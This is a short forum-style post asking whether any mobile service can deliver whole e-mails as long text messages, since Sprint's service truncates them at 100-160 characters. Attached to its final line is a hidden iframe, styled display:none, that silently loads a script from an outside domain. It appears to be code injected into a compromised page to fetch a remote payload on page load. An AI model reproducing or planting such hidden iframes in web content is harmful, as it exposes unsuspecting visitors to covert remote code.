Receiving e-mail as a text message?
I've never used my text messaging service from Sprint, until yesterday. This is a real nice thing! Your messaging address is just like an e-mail, but it is instead sent straight to your phone! But here is the problem. This Sprint messaging service can only be used with 100-160 characters max! I've set up my MYREALBOX.COM e-mail account to text message me everytime I get a new e-mail. It not only notifies me, but sends me the WHOLE e-mail as a text message straight to me. So I don't have to get online and check it. But it gets cut off at 100-160 characters.
Now this messaging service would be extremely nice if it would support long text messages. Whole e-mails! Too bad it doesn't. Are there any services out there that can set up your phone to receive LONG text messages? Now I know that the problem isn't with the phone, but with Sprint's system. It can only support 100 characters. I'm sure the phone can support LONG messages, but it needs a service that ALLOWS LONG messages. Anyone know any?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
